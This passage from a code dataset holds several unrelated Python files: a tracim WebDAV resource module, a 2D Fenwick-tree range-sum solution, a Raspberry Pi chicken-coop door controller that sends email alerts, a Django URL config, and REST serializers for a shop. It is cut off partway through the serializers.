workspace, content, HistoryType.Archived)\n\n        self._file_count = 0\n\n    def __repr__(self) -> str:\n        return \"<DAVCollection: ArchivedFolder (%s)>\" % self.content.file_name\n\n    def getCreationDate(self) -> float:\n        return mktime(datetime.now().timetuple())\n\n    def getDisplayName(self) -> str:\n        return '.archived'\n\n    def getLastModified(self) -> float:\n        return mktime(datetime.now().timetuple())\n\n    def getMember(self, content_label) -> _DAVResource:\n\n        content = self.content_api.get_one_by_label_and_parent(\n            content_label=content_label,\n            content_parent=self.content\n        )\n\n        return self.provider.getResourceInst(\n            path=self.path + '/' + transform_to_display(content.get_label_as_file()),\n            environ=self.environ\n        )\n\n    def getMemberNames(self) -> [str]:\n        retlist = []\n\n        for content in self.content_api.get_all_with_filter(\n                self.content if self.content is None else self.content.id, ContentType.Any):\n            retlist.append(content.get_label_as_file())\n\n            if content.type != ContentType.Folder:\n                self._file_count += 1\n\n        return retlist\n\n    def getMemberList(self) -> [_DAVResource]:\n        members = []\n\n        if self.content:\n            children = self.content.children\n        else:\n            children = self.content_api.get_all(False, ContentType.Any, self.workspace)\n\n        for content in children:\n            if content.is_archived:\n                content_path = '%s/%s' % (self.path, transform_to_display(content.get_label_as_file()))\n\n                if content.type == ContentType.Folder:\n                    members.append(Folder(content_path, self.environ, self.workspace, content))\n                elif content.type == ContentType.File:\n                    self._file_count += 1\n                    members.append(File(content_path, self.environ, content))\n                else:\n                    self._file_count += 1\n                    members.append(OtherFile(content_path, self.environ, content))\n\n        if self._file_count > 0 and self.provider.show_history():\n            members.append(\n                HistoryFolder(\n                    path=self.path + '/' + \".history\",\n                    environ=self.environ,\n                    content=self.content,\n                    workspace=self.workspace,\n                    type=HistoryType.Standard\n                )\n            )\n\n        return members\n\n\nclass HistoryFileFolder(HistoryFolder):\n    \"\"\"\n    A virtual resource that contains for a given content (file/page/thread) all its revisions\n    \"\"\"\n\n    def __init__(self, path: str, environ: dict, content: data.Content):\n        super(HistoryFileFolder, self).__init__(path, environ, content.workspace, content, HistoryType.All)\n\n    def __repr__(self) -> str:\n        return \"<DAVCollection: HistoryFileFolder (%s)>\" % self.content.file_name\n\n    def getDisplayName(self) -> str:\n        return self.content.get_label_as_file()\n\n    def createCollection(self, name):\n        raise DAVError(HTTP_FORBIDDEN)\n\n    def getMemberNames(self) -> [int]:\n        \"\"\"\n        Usually we would return a string, but here as we're working with different\n        revisions of the same content, we'll work with revision_id\n        \"\"\"\n        ret = []\n\n        for content in self.content.revisions:\n            ret.append(content.revision_id)\n\n        return ret\n\n    def getMember(self, item_id) -> DAVCollection:\n\n        revision = self.content_api.get_one_revision(item_id)\n\n        left_side = '%s/(%d - %s) ' % (self.path, revision.revision_id, revision.revision_type)\n\n        if self.content.type == ContentType.File:\n            return HistoryFile(\n                path='%s%s' % (left_side, transform_to_display(revision.file_name)),\n                environ=self.environ,\n                content=self.content,\n                content_revision=revision)\n        else:\n            return HistoryOtherFile(\n                path='%s%s' % (left_side, transform_to_display(revision.get_label_as_file())),\n                environ=self.environ,\n                content=self.content,\n                content_revision=revision)\n\n    def getMemberList(self) -> [_DAVResource]:\n        members = []\n\n        for content in self.content.revisions:\n\n            left_side = '%s/(%d - %s) ' % (self.path, content.revision_id, content.revision_type)\n\n            if self.content.type == ContentType.File:\n                
members.append(HistoryFile(\n                    path='%s%s' % (left_side, transform_to_display(content.file_name)),\n                    environ=self.environ,\n                    content=self.content,\n                    content_revision=content)\n                )\n            else:\n                members.append(HistoryOtherFile(\n                    path='%s%s' % (left_side, transform_to_display(content.file_name)),\n                    environ=self.environ,\n                    content=self.content,\n                    content_revision=content)\n                )\n\n        return members\n\n\nclass File(DAVNonCollection):\n    \"\"\"\n    File resource corresponding to tracim's files\n    \"\"\"\n    def __init__(self, path: str, environ: dict, content: Content):\n        super(File, self).__init__(path, environ)\n\n        self.content = content\n        self.user = UserApi(None).get_one_by_email(environ['http_authenticator.username'])\n        self.content_api = ContentApi(self.user)\n\n        # this is the property that windows clients expect to check if the file is read-write or read-only,\n        # but i wasn't able to set this property so you'll have to look into it >.>\n        # self.setPropertyValue('Win32FileAttributes', '00000021')\n\n    def __repr__(self) -> str:\n        return \"<DAVNonCollection: File (%d)>\" % self.content.revision_id\n\n    def getContentLength(self) -> int:\n        return self.content.depot_file.file.content_length\n\n    def getContentType(self) -> str:\n        return self.content.file_mimetype\n\n    def getCreationDate(self) -> float:\n        return mktime(self.content.created.timetuple())\n\n    def getDisplayName(self) -> str:\n        return self.content.file_name\n\n    def getLastModified(self) -> float:\n        return mktime(self.content.updated.timetuple())\n\n    def getContent(self) -> typing.BinaryIO:\n        filestream = compat.BytesIO()\n        filestream.write(self.content.depot_file.file.read())\n        filestream.seek(0)\n\n        return filestream\n\n    def beginWrite(self, contentType: str=None) -> FakeFileStream:\n        return FakeFileStream(\n            content=self.content,\n            content_api=self.content_api,\n            file_name=self.content.get_label_as_file(),\n            workspace=self.content.workspace,\n            path=self.path\n        )\n\n    def moveRecursive(self, destpath):\n        \"\"\"As we support recursive move, copymovesingle won't be called, though with copy it'll be called\n        but I have to check if the client ever calls that function...\"\"\"\n        destpath = normpath(destpath)\n\n        invalid_path = False\n\n        # if content is either deleted or archived, we'll check that we try moving it to the parent\n        # if yes, then we'll unarchive / undelete them, else the action's not allowed\n        if self.content.is_deleted or self.content.is_archived:\n            # we remove all archived and deleted from the path and we check that the destpath\n            # is equal, or else the path is not valid\n            # ex: /a/b/.deleted/resource, to be valid destpath has to be = /a/b/resource (no other solution)\n            current_path = re.sub(r'/\\.(deleted|archived)', '', self.path)\n\n            if current_path == destpath:\n                ManageActions(\n                    ActionDescription.UNDELETION if self.content.is_deleted else ActionDescription.UNARCHIVING,\n                    self.content_api,\n                    self.content\n                ).action()\n            else:\n                invalid_path = True\n        # if the content is not deleted / archived, check if we're trying to delete / archive it by\n        # moving it to a .deleted / .archived folder\n        elif basename(dirname(destpath)) in ['.deleted', '.archived']:\n            # same test as above ^\n            dest_path = re.sub(r'/\\.(deleted|archived)', '', destpath)\n\n            if dest_path == self.path:\n                ManageActions(\n                    ActionDescription.DELETION if '.deleted' in destpath else ActionDescription.ARCHIVING,\n                    self.content_api,\n                    self.content\n                ).action()\n            else:\n                invalid_path = True\n        # else we check if the path is good (not at the root path / not in a deleted/archived path)\n        # and we move the 
content\n        else:\n            invalid_path = any(x in destpath for x in ['.deleted', '.archived'])\n            invalid_path = invalid_path or any(x in self.path for x in ['.deleted', '.archived'])\n            invalid_path = invalid_path or dirname(destpath) == self.environ['http_authenticator.realm']\n\n            if not invalid_path:\n                self.move_file(destpath)\n\n        if invalid_path:\n            raise DAVError(HTTP_FORBIDDEN)\n\n    def move_file(self, destpath):\n\n        workspace = self.content.workspace\n        parent = self.content.parent\n\n        with new_revision(self.content):\n            if basename(destpath) != self.getDisplayName():\n                new_given_file_name = transform_to_bdd(basename(destpath))\n                new_file_name, new_file_extension = \\\n                    os.path.splitext(new_given_file_name)\n\n                self.content_api.update_content(\n                    self.content,\n                    new_file_name,\n                )\n                self.content.file_extension = new_file_extension\n                self.content_api.save(self.content)\n            else:\n                workspace_api = WorkspaceApi(self.user)\n                content_api = ContentApi(self.user)\n\n                destination_workspace = self.provider.get_workspace_from_path(\n                    destpath,\n                    workspace_api,\n                )\n\n                destination_parent = self.provider.get_parent_from_path(\n                    destpath,\n                    content_api,\n                    destination_workspace,\n                )\n\n                self.content_api.move(\n                    item=self.content,\n                    new_parent=destination_parent,\n                    must_stay_in_same_workspace=False,\n                    new_workspace=destination_workspace\n                )\n\n        transaction.commit()\n\n    def supportRecursiveMove(self, destPath):\n        return True\n\n    def delete(self):\n        ManageActions(ActionDescription.DELETION, self.content_api, self.content).action()\n\n\nclass HistoryFile(File):\n    \"\"\"\n    A virtual resource corresponding to a specific tracim's revision's file\n    \"\"\"\n    def __init__(self, path: str, environ: dict, content: data.Content, content_revision: data.ContentRevisionRO):\n        super(HistoryFile, self).__init__(path, environ, content)\n        self.content_revision = content_revision\n\n    def __repr__(self) -> str:\n        return \"<DAVNonCollection: HistoryFile (%s)>\" % self.content.file_name\n\n    def getDisplayName(self) -> str:\n        left_side = '(%d - %s) ' % (self.content_revision.revision_id, self.content_revision.revision_type)\n        return '%s%s' % (left_side, transform_to_display(self.content_revision.file_name))\n\n    def getContent(self):\n        filestream = compat.BytesIO()\n        filestream.write(self.content_revision.depot_file.file.read())\n        filestream.seek(0)\n\n        return filestream\n\n    def getContentLength(self):\n        return self.content_revision.depot_file.file.content_length\n\n    def getContentType(self) -> str:\n        return self.content_revision.file_mimetype\n\n    def beginWrite(self, contentType=None):\n        raise DAVError(HTTP_FORBIDDEN)\n\n    def delete(self):\n        raise DAVError(HTTP_FORBIDDEN)\n\n    def copyMoveSingle(self, destpath, ismove):\n        raise DAVError(HTTP_FORBIDDEN)\n\n\nclass OtherFile(File):\n    \"\"\"\n    File resource corresponding to tracim's page and thread\n    \"\"\"\n    def __init__(self, path: str, environ: dict, content: data.Content):\n        super(OtherFile, self).__init__(path, environ, content)\n\n        self.content_revision = self.content.revision\n\n        self.content_designed = self.design()\n\n        # workaround for consistent request as we have to return a resource with a path ending with .html\n        # when entering folder for windows, but only once because when we select it again it would have .html.html\n        # which is no good\n        if not self.path.endswith('.html'):\n            self.path += '.html'\n\n    def getDisplayName(self) -> str:\n        return self.content.get_label_as_file()\n\n    def getPreferredPath(self):\n        return self.path\n\n    def __repr__(self) -> str:\n        return \"<DAVNonCollection: OtherFile (%s)>\" % self.content.file_name\n\n    def getContentLength(self) -> int:\n        return len(self.content_designed)\n\n    def getContentType(self) -> str:\n        return 'text/html'\n\n    
def getContent(self):\n        filestream = compat.BytesIO()\n\n        filestream.write(bytes(self.content_designed, 'utf-8'))\n        filestream.seek(0)\n        return filestream\n\n    def design(self):\n        if self.content.type == ContentType.Page:\n            return designPage(self.content, self.content_revision)\n        else:\n            return designThread(\n                self.content,\n                self.content_revision,\n                self.content_api.get_all(self.content.content_id, ContentType.Comment)\n            )\n\n\nclass HistoryOtherFile(OtherFile):\n    \"\"\"\n    A virtual resource corresponding to a specific tracim's revision's page and thread\n    \"\"\"\n    def __init__(self, path: str, environ: dict, content: data.Content, content_revision: data.ContentRevisionRO):\n        super(HistoryOtherFile, self).__init__(path, environ, content)\n        self.content_revision = content_revision\n        self.content_designed = self.design()\n\n    def __repr__(self) -> str:\n        return \"<DAVNonCollection: HistoryOtherFile (%s)>\" % self.content.file_name\n\n    def getDisplayName(self) -> str:\n        left_side = '(%d - %s) ' % (self.content_revision.revision_id, self.content_revision.revision_type)\n        return '%s%s' % (left_side, transform_to_display(self.content_revision.get_label_as_file()))\n\n    def getContent(self):\n        filestream = compat.BytesIO()\n\n        filestream.write(bytes(self.content_designed, 'utf-8'))\n        filestream.seek(0)\n\n        return filestream\n\n    def delete(self):\n        raise DAVError(HTTP_FORBIDDEN)\n\n    def copyMoveSingle(self, destpath, ismove):\n        raise DAVError(HTTP_FORBIDDEN)\n","sub_path":"tracim/tracim/lib/webdav/sql_resources.py","file_name":"sql_resources.py","file_ext":"py","file_size_in_byte":40934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"19230815","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 17 16:16:25 2018\n\n@author: owen\n\"\"\"\n\nclass NumMatrix(object):\n\n    def __init__(self, matrix):\n        \"\"\"\n        :type matrix: List[List[int]]\n        \"\"\"\n        # time O(n^2 * (logn)^2)\n        self.m, self.n = len(matrix), len(matrix[0])\n        self.arr = [[0] * self.n for __ in range(self.m)] # record actual matrix data\n        self.BIT = [[0] * (self.n + 1) for __ in range(self.m + 1)]\n        for i in range(self.m):\n            for j in range(self.n):\n                self.update(i, j, matrix[i][j])\n\n    def update(self, row, col, val):\n        \"\"\"\n        :type row: int\n        :type col: int\n        :type val: int\n        :rtype: void\n        \"\"\"\n        # time O((logn)^2)\n        delta = val - self.arr[row][col]\n        self.arr[row][col] = val\n        row_idx = row + 1\n        while row_idx <= self.m:\n            col_idx = col + 1 # for each row, initialize col\n            while col_idx <= self.n:\n                self.BIT[row_idx][col_idx] += delta\n                col_idx += self.lowbit(col_idx)\n            row_idx += self.lowbit(row_idx)\n\n    def getPrefixSum2D(self, row, col):\n        # time O((logn)^2)\n        sums = 0\n        row_idx = row + 1\n        while row_idx > 0:\n            col_idx = col + 1\n            while col_idx > 0:\n                sums += self.BIT[row_idx][col_idx]\n                col_idx -= self.lowbit(col_idx)\n            row_idx -= self.lowbit(row_idx)\n        return sums\n\n    def lowbit(self, x):\n        return x & -x # lowest set bit of x\n\n    def sumRegion(self, row1, col1, row2, col2):\n        \"\"\"\n        :type row1: int\n        :type col1: int\n        :type row2: int\n        :type col2: int\n        :rtype: int\n        \"\"\"\n        return self.getPrefixSum2D(row2, col2) - self.getPrefixSum2D(row2, col1 - 1) - self.getPrefixSum2D(row1 - 1, col2) + self.getPrefixSum2D(row1 - 1, col1 - 1)\n\n\n# Your NumMatrix object will be instantiated and called as such:\n# obj = NumMatrix(matrix)\n# obj.update(row,col,val)\n# param_2 = obj.sumRegion(row1,col1,row2,col2)","sub_path":"Range Sum Query 2D - Mutable.py","file_name":"Range Sum Query 2D - 
Mutable.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"81979936","text":"#!/usr/bin/python3\n\nimport time\nfrom time import sleep\nimport RPi.GPIO as GPIO\nimport datetime\nfrom astral import Location\nimport pytz\nimport settings\n\nimport smtplib\n\n\nID = \"#1\"\nTIMEZONE = pytz.timezone('US/Eastern')\n\n\n## Even GPIO pins are outputs, odd pins are sensors.\nMOTOR_POSITIVE= 12 # Connected to AIN1 on the TB6612 motor driver\nMOTOR_NEGATIVE= 16 # Connected to AIN2 on the TB6612 motor driver\nSWITCH_TOP = 6\nSWITCH_BOTTOM = 13\nPHOTORESISTOR = 5\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(MOTOR_POSITIVE,GPIO.OUT) # Power\nGPIO.setup(MOTOR_NEGATIVE,GPIO.OUT) # Control\nGPIO.setup(SWITCH_BOTTOM, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) # Bottom switch\nGPIO.setup(SWITCH_TOP, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) # Top switch\nGPIO.setup(PHOTORESISTOR, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) # Photoresistor\n\n\nDOOR_TIMEOUT = 120 ## Constant for the maximum length of time the door should take to close.\nLIGHT_DELAY = 600 # Ten minutes\n\n## List of Email adresses to send error emails and updates to:\n#EMAIL_TO = []\n#EMAIL_TO = ['josh@wardensvillegardenmarket.org']\nEMAIL_TO = ['ehhsnerdz@gmail.com']\n#EMAIL_TO = [\"darzgood@gmail.com\"]\n\ndef setLocal():\n # Set timezone and location for Wardensville, WV\n logOutput(\"Setting up the timezone and location for Wardensville, WV...\")\n \n global loc\n loc = Location()\n loc.latitude = 39.084574\n loc.longitude = -78.592021\n loc.timezone = 'US/Eastern'\n \ndef logData(data):\n '''Log time data\n Used only for recording open and close times.'''\n with open(\"/home/pi/Desktop/ChickenCoopDoor/data.log\", \"a\") as datalog:\n datalog.write(data +\"\\n\")\n\ndef logOutput(data):\n '''Log all other info about program status, errors, emails, etc'''\n now = datetime.datetime.now(TIMEZONE).strftime(\"%x %X (%Z)\")\n with open(\"/home/pi/Desktop/ChickenCoopDoor/update.log\", \"a\") as datalog:\n datalog.write(\"{0}:\\t{1}\\n\".format(now,data))\n \n \ndef sendEmail(message):\n gmail_user = settings.gmail_user \n gmail_password = settings.gmail_password\n\n sent_from = gmail_user \n to = EMAIL_TO \n subject = 'Chicken Coop Door Update' \n body = message + \"\\nMessage Sent: \" + datetime.datetime.now(pytz.timezone('US/Eastern')).strftime(\"%x %X (%Z)\")\n\n email_text = '''From: {0}\\nTo: {1}\\nSubject: {2}\\n\\n{3}\\n\\n'''.format(sent_from, \", \".join(to), subject, body)\n\n try: \n server = smtplib.SMTP_SSL('smtp.gmail.com', 465)\n server.ehlo()\n server.login(gmail_user, gmail_password)\n server.sendmail(sent_from, to, email_text)\n server.close()\n\n logOutput(\"Email sent: '{0}'\".format(message))\n except: \n logOutput(\"Something went wrong with sending this email: '{0}'\".format(message))\n\n \ndef openDoor(): # Raise the door by powering AIN1 and grounding AIN2\n logOutput(\"Door opening...\")\n \n GPIO.output(MOTOR_POSITIVE,False)\n GPIO.output(MOTOR_NEGATIVE,True)\n sleep(DOOR_TIMEOUT)\n deactivateDoor()\n \n \n now = datetime.datetime.now(TIMEZONE).strftime(\"%x %X (%Z)\")\n #Make the output human friendly\n if (getDoorPosition() == 1): #It opened correctly\n logOutput(\"Door opened at: {0}\".format(now))\n logData(\"Opened: {0}\".format(now))\n sendEmail(\"Chicken coop door {1} opened: {0}\".format(now, ID))\n else:\n logOutput(\"Door Failed to open at: {0}\".format(now))\n logData(\"Failed open: {0}\".format(now))\n sendEmail(\"Alert: Chicken coop 
door {0} didn't open correctly. Please check it.\".format(ID))\n \ndef closeDoor(): # Lower the door by powering AIN1 and grounding AIN2\n logOutput(\"Door Closing...\")\n \n GPIO.output(MOTOR_POSITIVE,True)\n GPIO.output(MOTOR_NEGATIVE,False)\n sleep(DOOR_TIMEOUT) \n deactivateDoor()\n\n now = datetime.datetime.now(TIMEZONE).strftime(\"%x %X (%Z)\")\n \n if (getDoorPosition() == -1): #It closed correctly\n logOutput(\"Door closed at: {0}\".format(now))\n logData(\"Closed: {0}\".format(now))\n sendEmail(\"Chicken coop door {1} closed: {0}\".format(now, ID))\n else:\n logOutput(\"Door failed to close at: {0}\".format(now))\n logData(\"Failed close: {0}\".format(now))\n sendEmail(\"Alert: Chicken coop door {0} didn't close correctly. Please check it.\".format(ID)) \n \ndef deactivateDoor():\n GPIO.output(MOTOR_POSITIVE, False)\n GPIO.output(MOTOR_NEGATIVE, False)\n\ndef getDoorPosition():\n \"\"\"Read sensors to determine whether the coop door is up or down.\n -1=Down, 1=Up, 0=Unknown \"\"\"\n logOutput(\"Determining door position...\")\n doorPosition = 0 # Assume the door should be closed\n if GPIO.input(SWITCH_TOP):\n logOutput(\"Door found to be open\")\n doorPosition = 1\n elif GPIO.input(SWITCH_BOTTOM):\n logOutput(\"Door found to be closed\")\n doorPosition = -1\n else:\n logOutput(\"Failed to determine door position...\")\n doorPosition = 0\n \n return doorPosition\n\n# Timing methods\n \ndef openTime(date): # Calculate the hour of sunrise\n sunrise = loc.dawn(date = date)\n sunriseTime = sunrise.strftime(\"%x %X (%Z)\")\n return sunrise\n\ndef closeTime(date): # Calculate the hour of sunset\n sunset = loc.dusk(date = date)\n sunsetTime = sunset.strftime(\"%x %X (%Z)\")\n return sunset \n \ndef getNextMoveTime(doorPosition):\n '''\n returns the time for the next action for the door, \n checking to make sure it is the next time and not the previous:\n '''\n \n today = datetime.datetime.now(TIMEZONE)\n tomorrow = today + datetime.timedelta(days=1)\n if (doorPosition == -1): #Door is closed\n oTime = openTime(date=today)\n \n logOutput(\"Tentative open time: \"+oTime.strftime(\"%x %X (%Z)\"))\n if today >= oTime:\n logOutput(\"Oops, that was yesterday's opening time\")\n oTime = openTime(date = tomorrow)\n logOutput(\"Next open time: \" + oTime.strftime(\"%x %X (%Z)\"))\n return oTime\n elif (doorPosition == 1): #Door is open\n \n cTime = closeTime(date = today)\n logOutput(\"Tentative close time: \"+cTime.strftime(\"%x %X (%Z)\"))\n if today >= cTime:\n logOutput(\"Oops, that was yesterday's closing time\")\n cTime = closeTime(date = tomorrow)\n logOutput(\"Next close time: \" + cTime.strftime(\"%x %X (%Z)\"))\n return cTime\n else: \n logOutput(\"Error: getNextMoveTime called without a valid door position\")\n return tomorrow\n \ndef initializeDoorByTime(doorPosition=0):\n \"\"\"\n Set the door to the correct position for the calculated time.\n Run once at boot.\n \"\"\"\n \n now = datetime.datetime.now(TIMEZONE)\n \n oTime = openTime(date=now)\n cTime = closeTime(date=now)\n \n if (now < oTime) or (now > cTime): #Before dawn, after dusk\n if (doorPosition == -1): #Door is already closed\n pass\n else:\n closeDoor()\n doorPosition = -1\n else: # oTime <= now <= cTime: # During daytime\n if (doorPosition == 1): #Door is already open\n pass\n else:\n openDoor()\n doorPosition = 1\n \n return doorPosition\n \n \ndef runByTime(doorPosition):\n '''Activates the chicken coop door based on dawn and dusk calculations \n from on astral.'''\n \n doorPosition = 
initializeDoorByTime(doorPosition)\n \n if getDoorPosition() == 0: #The door is not recognized at either the up or down positions\n sendEmail(\"Critical Alert: Chicken coop door {0} could not be initialized. \\\nPlease make sure that both the door and the sensors are working correctly. \\\nContinuing with runtime procedure.\".format(ID))\n \n \n while (1):\n now = datetime.datetime.now(TIMEZONE)\n nextMoveTime = getNextMoveTime(doorPosition)\n waitTime = (nextMoveTime-now).total_seconds()\n \n sleep(waitTime)\n \n if doorPosition == 1:\n closeDoor()\n doorPosition = -1\n else:\n openDoor()\n doorPosition = 1\n \n# Light methods\ndef checkAmbientLight():\n return GPIO.input(PHOTORESISTOR)\n \ndef runByLight(doorPosition):\n '''Activates the chicken coop door based on light levels detected.'''\n \n delay = LIGHT_DELAY\n #delay = 60 # Testing purposes: 1 minute\n \n if doorPosition == 0: # Check for an undefined door position\n openDoor()\n doorPosition = 1\n \n while(1):\n lightLevel = checkAmbientLight()\n \n if doorPosition == 1 and checkAmbientLight() == 1: #Door is up and it's light\n pass\n elif doorPosition == -1 and checkAmbientLight() == 0: #Door is down and it's dark\n pass\n \n elif doorPosition == 1 and checkAmbientLight() == 0: #Door is up but it's dark\n logOutput(datetime.datetime.now(TIMEZONE).strftime(\"%x %X (%Z)\")+\" -- It's dark out there\")\n closeDoor()\n doorPosition = -1\n \n elif doorPosition == -1 and checkAmbientLight() == 1: #Door is down but it's light\n logOutput(datetime.datetime.now(TIMEZONE).strftime(\"%x %X (%Z)\")+\" -- It's light out there\")\n openDoor()\n doorPosition = 1\n \n sleep(delay);\n \n \ndef main():\n sendEmail(\"The program for chicken coop door {0} has started! \\\nIf you did not restart it, please check that it is still working correctly. \\\nThe system could be having power issues.\".format(ID))\n setLocal()\n \n doorPosition = getDoorPosition()\n if (doorPosition == 0): #The door is neither up nor down\n sendEmail(\"Alert: The position of chicken coop door {0} could not be determined. Attempting to auto initialize.\".format(ID))\n \n runByTime(doorPosition)\n ## Or...\n #runByLight(doorPosition) \n\ntry:\n main()\n\nexcept (KeyboardInterrupt):\n pass\n\nfinally:\n sendEmail(\"Critical Alert: The program for chicken door {0} has died. Please restart it.\".format(ID))\n GPIO.cleanup()\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":10028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"67415858","text":"from django.urls import path\n\nfrom . 
import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('getDynastyList', views.getDynastyList, name='getDynastyList'),\n path('saveDynasty', views.saveDynasty, name='saveDynasty'),\n path('removeDynasty', views.removeDynasty, name='removeDynasty'),\n]\n","sub_path":"dc_history/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"304009111","text":"from rest_framework import serializers\nfrom rest_framework.serializers import ModelSerializer, Serializer\n\nfrom accounting.models import Seller, User, Company\nfrom main.models import Category, Product, Brand, Type\nfrom shopping.models import OrderLine, Order\n\n\nclass CategoryListSerializer(ModelSerializer):\n parent = serializers.SerializerMethodField()\n\n class Meta:\n model = Category\n fields = [\n \"pk\",\n \"title\",\n \"image\",\n \"is_leaf\",\n \"level\",\n \"parent\"\n ]\n\n def get_parent(self, obj):\n if obj.parent:\n return obj.parent.title\n return \"\"\n\n\nclass CategorySerializer(ModelSerializer):\n class Meta:\n model = Category\n fields = [\n \"pk\",\n \"title\",\n \"image\",\n \"parent\"\n ]\n extra_kwargs = {'pk': {'read_only': True}}\n\n\nclass BrandSerializer(ModelSerializer):\n class Meta:\n model = Brand\n fields = (\n 'title',\n 'id',\n )\n\n\nclass ProductListSerializer(ModelSerializer):\n brand = serializers.SerializerMethodField()\n parent = serializers.SerializerMethodField()\n\n class Meta:\n model = Product\n fields = [\n \"pk\",\n \"title\",\n \"price\",\n \"discounted_price\",\n \"image\",\n \"existStatus\",\n \"brand\",\n \"parent\",\n ]\n\n def get_brand(self, obj):\n return obj.brand.title\n\n def get_parent(self, obj):\n return obj.parent.title\n\n\nclass ProductSerializer(ModelSerializer):\n class Meta:\n model = Product\n fields = [\n \"pk\",\n \"title\",\n \"price\",\n \"discounted_price\",\n \"image\",\n \"existStatus\",\n \"brand\",\n \"parent\",\n ]\n extra_kwargs = {'pk': {'read_only': True}}\n\n\nclass TypeSerializer(ModelSerializer):\n class Meta:\n model = Type\n fields = (\n 'title',\n 'id',\n )\n\n\nclass SellerListSerializer(ModelSerializer):\n phone_number = serializers.SerializerMethodField()\n first_name = serializers.SerializerMethodField()\n last_name = serializers.SerializerMethodField()\n\n class Meta:\n model = Seller\n fields = [\n \"pk\",\n \"phone_number\",\n \"first_name\",\n \"last_name\",\n \"home_phone\",\n \"address\",\n \"latitude\",\n \"longitude\",\n \"verification_code\",\n ]\n\n def get_phone_number(self, obj):\n return obj.user.username\n\n def get_first_name(self, obj):\n return obj.user.first_name\n\n def get_last_name(self, obj):\n return obj.user.last_name\n\n\nclass SellerSerializer(ModelSerializer):\n phone_number = serializers.CharField(write_only=True)\n first_name = serializers.CharField(write_only=True, required=False, allow_blank=True, default=\"\")\n last_name = serializers.CharField(write_only=True, required=False, allow_blank=True, default=\"\")\n\n class Meta:\n model = Seller\n fields = [\n \"pk\",\n \"phone_number\",\n \"first_name\",\n \"last_name\",\n \"home_phone\",\n \"address\",\n \"latitude\",\n \"longitude\",\n \"verification_code\",\n ]\n extra_kwargs = {'pk': {'read_only': True}}\n\n def create(self, validated_data):\n user = User.objects.create(\n is_seller=True,\n username=validated_data.pop('phone_number'),\n first_name=validated_data.pop('first_name'),\n 
last_name=validated_data.pop('last_name'),\n )\n user.set_password(validated_data['verification_code'])\n user.save()\n seller = Seller.objects.create(user=user, **validated_data)\n return seller\n\n def update(self, instance, validated_data):\n instance.user.username = validated_data.pop('phone_number')\n instance.user.first_name = validated_data.pop('first_name')\n instance.user.last_name = validated_data.pop('last_name')\n instance.user.save()\n return super(SellerSerializer, self).update(instance, validated_data)\n\n\nclass CompanyListSerializer(ModelSerializer):\n username = serializers.SerializerMethodField()\n\n class Meta:\n model = Company\n fields = [\n \"pk\",\n \"username\",\n \"name\",\n ]\n\n def get_username(self, obj):\n return obj.user.username\n\n\nclass CompanySerializer(ModelSerializer):\n username = serializers.CharField(write_only=True)\n password = serializers.CharField(write_only=True)\n\n class Meta:\n model = Company\n fields = [\n \"pk\",\n \"username\",\n \"password\",\n \"name\",\n ]\n extra_kwargs = {'pk': {'read_only': True}}\n\n def create(self, validated_data):\n user = User.objects.create(\n is_company=True,\n username=validated_data.pop('username'),\n )\n user.set_password(validated_data.pop('password'))\n user.save()\n company = Company.objects.create(user=user, **validated_data)\n return company\n\n def update(self, instance, validated_data):\n instance.user.username = validated_data.pop('username')\n instance.user.set_password(validated_data.pop('password'))\n instance.user.save()\n return super(CompanySerializer, self).update(instance, validated_data)\n\n\nclass OrderLineSerializer(ModelSerializer):\n class Meta:\n model = OrderLine\n fields = (\n 'id',\n \"amount\",\n \"price\",\n \"product\",\n )\n\n\nclass CreateOrderLineSerializer(Serializer):\n product = serializers.IntegerField()\n amount = serializers.IntegerField()\n\n\nclass OrderListSerializer(ModelSerializer):\n price = serializers.SerializerMethodField()\n owner = serializers.SerializerMethodField()\n\n class Meta:\n model = Order\n fields = [\n \"pk\",\n \"owner\",\n \"created_on\",\n \"status\",\n \"code\",\n \"price\",\n ]\n extra_kwargs = {'pk': {'read_only': True}}\n\n def get_price(self, obj):\n sum = 0\n for line in obj.lines.all():\n sum = sum + line.price\n return sum\n\n def get_owner(self, obj):\n return obj.owner.user.username\n\n\nclass OrderRetrieveSerializer(ModelSerializer):\n lines = OrderLineSerializer(many=True)\n\n class Meta:\n model = Order\n fields = [\n \"pk\",\n \"owner\",\n \"created_on\",\n \"status\",\n \"code\",\n \"lines\",\n ]\n extra_kwargs = {'pk': {'read_only': True}}\n\n\nclass OrderSerializer(ModelSerializer):\n lines = CreateOrderLineSerializer(write_only=True, many=True)\n\n class Meta:\n model = Order\n fields = [\n \"pk\",\n \"owner\",\n \"status\",\n \"lines\",\n ]\n extra_kwargs = {'pk': {'read_only': True}}\n\n def create(self, validated_data):\n order = Order.objects.create(owner=validated_data.pop('owner'), status=validated_data.pop('status'))\n for line in validated_data.pop('lines'):\n product = Product.objects.get(id=line[\"product\"])\n amount = line[\"amount\"]\n OrderLine.objects.create(order=order, product=product, amount=amount, price=amount * product.price)\n\n return order\n\n def update(self, instance, validated_data):\n request_lines=validated_data.pop('lines')\n\n for order_line in instance.lines.all():\n if order_line.product.id not in [line[\"product\"] for line in request_lines]:\n order_line.delete()\n\n for line in 
